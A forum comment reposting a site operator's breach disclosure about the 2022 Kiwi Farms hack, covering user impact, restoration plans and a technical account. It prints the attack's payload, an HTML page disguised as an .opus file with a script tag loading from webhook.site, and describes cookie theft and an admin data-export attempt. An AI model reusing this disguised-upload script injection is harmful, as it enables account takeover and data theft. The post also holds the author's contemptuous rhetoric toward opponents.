Kiwi Farms was hacked, accounts compromised

submitted by [deleted] from i.imgur.com

sorted by:
top
newinsightfulfun
you are viewing a single comment's thread.

view the rest of the comments →

[–][deleted] 6 insightful - 1 fun6 insightful - 0 fun7 insightful - 1 fun -  (0 children)

From kiwifarms.net:

Site Breach

User Impact Statement

The forum was hacked. You should assume the following.

  • Assume your password for the Kiwi Farms has been stolen.
  • Assume your email has been leaked.
  • Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.

Thankfully, most users pay attention to my privacy checkups and there isn't much to leak. You should take a moment to read privacytools.io, even if you hate this site. Use an email address freom a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyTools. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.

I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence.

Prognosis

The site will be restored from a backup point taken at September 17th at Noon GMT.

This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.

Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle I have spread myself very thin and hurridly replaced old systems with new ones that are not properly vetted.

Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.

I am very, very tired of writing statements like this, but I find it difficult the stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.

More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.

Technical Explanation

Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.

A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.

Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count, and if they are staff.

However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.

2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0" It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data. The file uploaded was an .opus file that contained a web document that looked like this.

<!DOCTYPE html>
<script src=//webhook.site/payload-url> </script>

I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.

The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.

The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.

x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 You can find relevant scripts below.

https://github.com/jaw-sh/ruforo/blob/master/src/bin/xf_chat/main.rs
https://github.com/jaw-sh/ruforo/blob/master/resources/js/chat.js
https://github.com/jaw-sh/ruforo/tree/master/src/bbcode

XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.

The sophistication in this attack is very high, and shows an intimiate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.

There are so many more people trying to destroy than create.

Take it easy,
Josh
jcmoon@pm.me

P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.